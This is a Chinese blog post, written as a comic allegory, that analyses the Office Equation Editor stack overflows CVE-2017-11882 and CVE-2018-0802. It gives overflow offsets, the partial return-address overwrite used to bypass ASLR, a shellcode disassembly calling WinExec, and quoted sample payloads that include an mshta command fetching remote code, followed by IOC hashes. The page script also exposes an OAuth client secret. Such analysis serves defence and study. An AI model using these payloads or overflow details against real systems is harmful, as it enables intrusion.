<!DOCTYPE html>
<html>
<head>
    <meta http-equiv="content-type" content="text/html; charset=utf-8">
    <meta content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=0" name="viewport">
    <title>Y11en</title>
    
<link rel="stylesheet" href="/css/style.css">

    
<link rel="stylesheet" href="/css/gitment.css">

    <link rel="stylesheet" type="text/css" href="//at.alicdn.com/t/font_859455_eaq7v6w8ktj.css">
<meta name="generator" content="Hexo 4.2.0"></head>
<body>
<header class="header">
    <div class="header-inner">
        <div class="header-title">

        </div>
        <nav class="header-nav">
            
            <a href="/" class="header-nav-link" >
                首页
            </a>
            

            
            <a href="/archives" class="header-nav-link">
                归档
            </a>
            

            
            <a href="/tags" class="header-nav-link">
                标签
            </a>
            

            
            <a href="/about/" class="header-nav-link">
                关于
            </a>
            
        </nav>
    </div>
</header>
<header class="mobile-header">
    <div class="mobile-nav">
        <div class="mobile-nav-icon">
            <span></span>
            <span></span>
            <span></span>
        </div>
        <div class="mobile-nav-title">
            <a href="/" class="mobile-nav-title-link">y11en's Blog</a>
        </div>

    </div>
    <nav class="mobile-menu">
        <ul class="mobile-menu-list">
            <li class="mobile-menu-item">
                <i class="iconfont icon-home"></i>
                <a href="/" class="mobile-nav-link">首页</a>
            </li>
            <li class="mobile-menu-item">
                <i class="iconfont icon-archive"></i>
                <a href="/archives" class="mobile-nav-link">归档</a>
            </li>
            <li class="mobile-menu-item">
                <i class="iconfont icon-tag"></i>
                <a href="/tags" class="mobile-nav-link">标签</a>
            </li>
            <li class="mobile-menu-item">
                <i class="iconfont icon-about"></i>
                <a href="/about/" class="mobile-nav-link">关于</a>
            </li>
        </ul>
    </nav>
</header>
<div class="main">
    <div class="content-inner">
        <div class="posts">
    <article class="post-whole">
        <div class="post-title">
            <h2 class="title">“束发少年”EQNEDT32的陨落</h2>
            <div class="post-meta">
                <span class="post-time">2018-01-13</span>
				
                <span class="post-category">
                    
                    <a class="category" href="/categories/%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/">漏洞分析</a>
                    
                </span>
                
                <span class="post-visit"> 阅读次数：<span id="busuanzi_value_page_pv"></span></span>
            </div>
        </div>
        <div class="post-toc" id="post-toc">
    <strong class="post-toc-title">目录</strong>
    <ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#前言"><span class="toc-text">前言</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#惹上麻烦"><span class="toc-text">惹上麻烦</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#从CVE-2017-11882-事件说起"><span class="toc-text">从CVE-2017-11882 事件说起</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#医学科报告"><span class="toc-text">医学科报告:</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#刑侦科报告"><span class="toc-text">刑侦科报告:</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#转折"><span class="toc-text">转折</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#接CVE-2018-0802-事件"><span class="toc-text">接CVE-2018-0802 事件</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#医疗诊断说明-分析报告"><span class="toc-text">医疗诊断说明(分析报告)</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#后记"><span class="toc-text">后记</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#有问题的药-IOC"><span class="toc-text">有问题的药(IOC)</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#REF"><span class="toc-text">REF</span></a></li></ol>
    <div class="back-to-top" id="back-to-top">
        <a href="javascript:void(0);">回到顶部</a>
    </div>
</div>
        <div class="post-content">
            <h1 id="前言"><a href="#前言" class="headerlink" title="前言"></a>前言</h1><p>由非正经分析人员在非工作时间以非常规角度描述的非真实故事。<br>故事剧情纯属虚构，如有雷同，纯属搞事。</p>
<a id="more"></a>

<h1 id="惹上麻烦"><a href="#惹上麻烦" class="headerlink" title="惹上麻烦"></a>惹上麻烦</h1><p>近期，<code>Microsoft office</code>一家人惹上大麻烦了，都是收养的小儿子”EQNEDT32”搞的，警察局的人都上门找好几次了，到底是为啥呢？这还得从去年的”CVE-2017-11882”事件说起。<br>2017年7月某天，隔壁Embedi家的老王发现”EQNEDT32”这小子大半夜翻墙出去直到凌晨天刚亮才回来，而且衣服脏脏烂烂，这件事其实并没有引起老王太大的注意，但不巧的是，这情况一直持续好几周，老王最终还是决定告诉”office”一家之长——-老软。<br>老软这个人其实是一个很不错的商人，但仅此而已，他马上找到“EQNEDT32”一问究竟，<br>“EQNEDT32”也很老实，直接告诉老软”最近在研究密室进入这个技术，也就是如何在大门紧锁且没有钥匙的情况下进去把门开开“。<br>老软一乐，”ORz，养了这么大，终于看到儿子能在放学之后除了看书还能有点别的兴趣爱好了“，“那你啥想法，为啥大半夜出去?”老软疑惑问道。<br>”哦，我的软die，可以用铲子挖洞进去啊，我最近就在挖咱家那窗户店，大白天要上课，所以晚上去挖，呵呵“，<br>”卧槽，你这不是坑你爹吗，那你挖的咋样啊？“，<br>”已经挖通了，就等写结题报…“，顾不得听完儿子的话，老软赶紧开车去店铺查看情况。</p>
<h1 id="从CVE-2017-11882-事件说起"><a href="#从CVE-2017-11882-事件说起" class="headerlink" title="从CVE-2017-11882 事件说起"></a>从CVE-2017-11882 事件说起</h1><p>二十分钟的车程这次只开了十二分钟就到了，到店一看，大门敞开，收银台、保险柜连着墙皮被撬走，窗户啥的倒是都在，损失怕不是有点大咯，赶紧报警，警察同志以神速给出了案件的通报，如下:</p>
<h2 id="医学科报告"><a href="#医学科报告" class="headerlink" title="医学科报告:"></a>医学科报告:</h2><p>“EQNEDT32”可能是服用了某种不正常的药物——CVE-2017-11882，关键成分”Equation Native”，其结构如下图，<code>MTEF Byte Stream</code>部分给出的是<code>MTEF V.3版</code>的<code>FONT record</code>结构，因为出问题的就在这个结构。</p>
<p><img src="./2018-01-13-15-41-25.jpg" alt=""><br>在未征得老软的同意，强行对”EQNEDT32”大脑进行了解剖(还活着)，抱歉。<br>发现其处理<code>字体结构</code>时存在问题<br><img src="./2018-01-13-15-50-07.jpg" alt=""><br>处理链 sub_4214C6 -&gt;  sub_4115A7 -&gt; sub_41160F，由于栈上变量vul_val大小只有0x24 = 36字节，即使算上v13，old_ebp也只有44个字节，那么当长度足够长的字体名称(font name) &gt; 44个字节则会覆盖掉返回地址，造成栈缓冲区溢出，轻则心理扭曲，重则走上不归路(原来的返回地址被覆盖了，想回也不好回啊)。<br><img src="./2018-01-13-15-53-24.jpg" alt=""></p>
<h2 id="刑侦科报告"><a href="#刑侦科报告" class="headerlink" title="刑侦科报告:"></a>刑侦科报告:</h2><p> 通过<code>医学科</code>的报告，知道<code>EQNEDT32</code>这小子是存在严重问题，并且作为家长的老软也没有给孩子讲授比较关键的&lt;青少年预防犯罪心理疏导&gt;课程，比如 ASLR、DEP、GS啥啥的，使得<code>EQNEDT32</code>长期处于裸奔的状态。<br>通过对样品(POC)的分析，如下:<br><img src="./2018-01-13-16-15-13.jpg" alt=""><br>选中的蓝色部分即为44字节缓冲区，红色圈中即为”新的返回地址“，对应<code>Call WinExec</code>，当成功覆盖并返回时，栈中的参数1即为 sub_41160F的参数1，也就是输入的那44字节字体名称，造成执行”winexec(‘cmd.exe /ccalc.exe &amp; ‘“)”。<br><img src="./2018-01-13-16-16-49.jpg" alt=""><br>知道问题原因后，警察叔叔通过高科技，锁定了三种有问题的药制品厂家，他们负责人的供词如下:<br>厂A: 没有啊，那个font name给的 cmd <a href="http://a.b/c" target="_blank" rel="noopener">http://a.b/c</a> ，其他人吃着没事啊<br>厂B: 别瞎说，我们是正规企业，font name参入了mshta <a href="http://a.b/c而已" target="_blank" rel="noopener">http://a.b/c而已</a><br>厂C: 怎么会，cmd.exe /c %temp%\a.tmp 也有问题吗，ole自动释放的不怪我们啊<br>最后结论: <code>EQNEDT32</code> 自身存在问题，药品只对他造成了严重影响，其他未见到有消费者反馈，店铺被偷主要还是<code>EQNEDT32</code>挖的洞造成犯罪人员有机可乘，负主要责任，目前警方仍在侦破中…</p>
<p>看完<code>通报</code>，老软很生气啊，一来自己对孩子没有教育好，导致孩子吃药还能把脑子吃坏，二来，这店铺的案件怕是得费很久时间还不一定能把犯罪人员抓回来，就算抓回来钱大概也是没了。<br>一首&lt;凉凉&gt;听完，老软决定还是得给儿子进行二次教育，把错过的&lt;青少年预防犯罪心理疏导&gt;课程给儿子上完，但毕竟儿子都这么大了，回炉重造怕是很难，儿子听完ASLR之后就烦了，坚决不听课了，再说跳楼，虽然老软知道儿子说的楼就是台阶(20CM高)，但也不舍得啊，所以也就不再强迫。<br>当然， <code>EQNEDT32</code>也学乖了，并且听了老软的话，他也有了一些变化，一是他学习了ASLR，自身有了一定的抗性(能学会还得亏有重定位表，然后DLLCharacteristics字段设置为0x40即可)，同时“解剖”也不是白做的，医学科老教授给他patch了下脑子，现在就可以可以抵抗CVE-2017-11882，想想也开心。<br><img src="./2018-01-13-17-16-45.jpg" alt=""><br>当然，事情如果到这里结束，怕和”陨落“没有半毛钱关系，所以下面还得搞些事情。</p>
<h1 id="转折"><a href="#转折" class="headerlink" title="转折"></a>转折</h1><p>老软也觉得儿子是真的变好了，逐渐将自己的心思放在了自家的窗户店的经营上，为了避免出现上次店被偷， 他特意请了一个打杂的，专门负责晚上值夜班，生意也渐渐有了起色，几个月相安无事。<br>某天清早，天还没亮，手机突然急匆匆响起来，老软以为闹钟，直接关掉，倒头再睡，没多久，座机又响了，一边骂着”mmp“，一边挪着身体去关座机，抬起电话准备扣下的时候，瞄到来电显示是999，赶紧清醒起来抬手说”喂，我是老软，警察叔叔找我啥事？“ ，”来趟公安局吧，你儿子又出事了“，话音刚毕，老软已经开车在路上了。</p>
<h1 id="接CVE-2018-0802-事件"><a href="#接CVE-2018-0802-事件" class="headerlink" title="接CVE-2018-0802 事件"></a>接CVE-2018-0802 事件</h1><p>到公安局门口才发现，有一堆人在门口，不知谁喊了一句，一伙人把老软给围了起来，要不是有警察叔叔保护，怕老软就真的软了，长官李Sir告诉他，”昨夜，商业街整条街道全部被偷，就你家店铺好着，同时监控显示，你儿子’EQNEDT32’在商业街转悠了一晚上，已经被拘留，但不幸的是，他刚被逮捕没多久，就失去意识，可能有生命危险，目前已经紧急进行了手术，目前医生给出的解释是<code>疑似CVE-2018-0802中毒</code>“，你看下这个报告吧。</p>
<h2 id="医疗诊断说明-分析报告"><a href="#医疗诊断说明-分析报告" class="headerlink" title="医疗诊断说明(分析报告)"></a>医疗诊断说明(分析报告)</h2><p>经过对上次<code>CVE-2017-11882</code>事件发生时，<code>EQNEDT32</code>的医疗数据进行进一步分析，发现其存在另一处的栈溢出问题，如下:<br><img src="./2018-01-14-11-49-10.jpg" alt=""><br>在sub_421E39逻辑中，直接将<code>font Name</code>拷贝到sub_421774栈中，其变量lf的大小为0xAC共172字节，但复制时从+0x1C处开始，所以有0xAC-0x1C为144字节，算上old_ebp有148字节，所以当<code>font name</code>大于148字节时，会造成返回地址覆盖，造成栈溢出。<br><img src="./2018-01-14-11-49-51.jpg" alt=""><br>通过对身体内残留药物(POC)的分析下，数据如下图，<br><img src="./2018-01-14-12-53-56.jpg" alt=""><br>其中蓝色选中数据即为font name的字段，长度为148，红色选中为需要覆盖的返回地址，但由于strcpy复制时会遇到<code>\x00</code>结束，所以实际修改了原始地址的低16位，为什么会选择<code>0x0025</code>呢？因为<code>EQNEDT32</code>没有开启DEP，而且返回地址后有一个<code>font name</code>的指针，那么可通过找到一个<code>ret</code>指令地址，使得让eip指向<code>font name</code>直接执行<code>shellcode</code>了，以此绕过ASLR防护，那这个<code>ret</code>指令的寻找受到了限制(受限于原返回地址)，其只能从rva范围0x20000 ~ 0x200FF寻找，不巧这个值有且只有一个,位于<code>rva = 0x20025</code>，故取0x0025。<br><img src="./2018-01-14-13-16-32.jpg" alt=""><br>既然能够执行任意shellcode(目前长度148还行，内存里面其实还可以再跳一跳，这就很长了)，那当然八仙过海各显神通了。<br>该POC实现的依然是跳入winexec执行cmd，启动因OLE缓存机制事先放在%temp%下的PE文件。</p>
<figure class="highlight plain"><table><tr><td class="code"><pre><span class="line">						 xor eax,eax</span><br><span class="line">						 push eax</span><br><span class="line">0034ee5f 8d442452        lea     eax,[esp+52h]</span><br><span class="line">0034ee63 50              push    eax</span><br><span class="line">0034ee64 eb1d            jmp     0034ee83</span><br><span class="line">0034ee83 90              nop</span><br><span class="line">0034ee84 90              nop</span><br><span class="line">0034ee85 90              nop</span><br><span class="line">0034ee86 8b44242c        mov     eax,dword ptr [esp+2Ch] ss:002b:0034ee3c&#x3D;013db463</span><br><span class="line">0034ee8a 662d51a8        sub     ax,0A851h</span><br><span class="line">0034ee8e ffe0            jmp     eax &#123;EqnEdt32!MFEnumFunc+0x2415 (013d0c12)&#125;</span><br><span class="line">013d0c12 ff151c684001    call    kernel32!WinExec</span><br></pre></td></tr></table></figure>
<p>当然，也观察到有部分样本通过枚举kernel32模块的导出表，查找ExpandEnvironmentStringsA、CopyFileA、ExitProcess函数，将%temp%下携带的office恶意插件放入word的自启动路径中(把窃听器丢入你家门口啊)<br><img src="./2018-01-14-15-26-21.jpg" alt=""></p>
<p>老软看到这里，心里凉了一半，这小子咋就老犯病呢，这时，李sir跑过来，看起来很捉急，“老软，先冷静一下，我有个不好的消息告诉你，那就是你家’EQNEDT32’快不行了，医生准备2次patch这小子脑子的时候，存在意见分歧，争吵了半个小时，最后决定不patch了，但很遗憾，这小子已经凉了，是医疗事故，赔偿应该没问题的，你要…”话还没说完,老软头犯晕昏过去了.</p>
<h1 id="后记"><a href="#后记" class="headerlink" title="后记"></a>后记</h1><p>事情已经过去快一周了,老软早恢复了,窗户店依旧开着,日子也和平常一般过着.<br>邻居老王最近生病了,病的不轻,有传言说”EQNEDT32”是老王的儿子,但这又能怎么样呢?毕竟人已经没了。</p>
<h1 id="有问题的药-IOC"><a href="#有问题的药-IOC" class="headerlink" title="有问题的药(IOC)"></a>有问题的药(IOC)</h1><p>C22937CEE87B45BA18C16318533648FB<br>37BF2DF225650B39C9874ECF392A9A9B<br>8E8C2B4AA6C35686945C074306DB041E<br>E27E9C455CBB9F9E5FB65597791FF33A</p>
<h1 id="REF"><a href="#REF" class="headerlink" title="REF"></a>REF</h1><p>格式参考<br><a href="https://stackoverflow.com/questions/15320088/parse-mathtype-mtef-data-from-ole-binary-string" target="_blank" rel="noopener">https://stackoverflow.com/questions/15320088/parse-mathtype-mtef-data-from-ole-binary-string</a><br>MTEF v3的介绍<br><a href="http://rtf2latex2e.sourceforge.net/MTEF3.html" target="_blank" rel="noopener">http://rtf2latex2e.sourceforge.net/MTEF3.html</a><br>管家写的”黑凤梨”一篇<br><a href="http://www.freebuf.com/column/159865.html" target="_blank" rel="noopener">http://www.freebuf.com/column/159865.html</a></p>

        </div>
        
    </article>
</div>
<div class="paginator">
    
        
            <a class="prev" href="/2018/03/31/%E9%99%86%E7%BB%AD%E6%96%B0%E5%A2%9E%E6%97%A7%E6%96%87%E7%AB%A0/">
                <i class="iconfont icon-prev"></i>
                <span class="nav-default">陆续新增旧文章中</span>
                <span class="nav-mobile">上一篇</span>
            </a>
        
        
            <a class="next" href="/2017/12/13/pwnable-tw-dubblesort/">
                <span class="nav-default">pwnable.tw-dubblesort</span>
                <span class="nav-mobile">下一篇</span>
                <i class="iconfont icon-next"></i>
            </a>
        
    
</div>
<div id="comment-container"></div>
    </div>
</div>
<footer class="footer-social">
    
    <a class="social-link" target="_blank" href="https://github.com/y11en">
        <i class="iconfont icon-github"></i>
    </a>
    

    

    

    <div class="footer-copyright">
        <p class="time-line">
            &copy;
            
            
                2015 -
            
            2020
            &nbsp;<i class="iconfont icon-heart"></i>&nbsp;
            <a target="_blank" href="https://github.com/iJinxin">y11en</a>
        </p>
        <p class="theme-info">
            Powered by <a target="_blank" href="https://hexo.io">Hexo</a>  |  Theme -
            <a target="_blank" href="https://github.com/iJinxin/hexo-theme-sky">Sky</a>
        </p>
    </div>
</footer>
</body>
<script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.3.1/jquery.min.js"></script>

<script src="/js/index.js"></script>

<script async src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>
<script src="https://imsun.github.io/gitment/dist/gitment.browser.js"></script>
<script>
    
    var gitment = new Gitment({
        id: '“束发少年”EQNEDT32的陨落',
        owner: 'y11en',
        repo: 'y11en.github.io',
        oauth: {
            client_id: '5049946d5d3f1d55996d',
            client_secret: 'ebe785ea8e3f9b280d57a372588af2a202f0638c'
        }
    });
    gitment.render('comment-container');
    

</script>
</html>
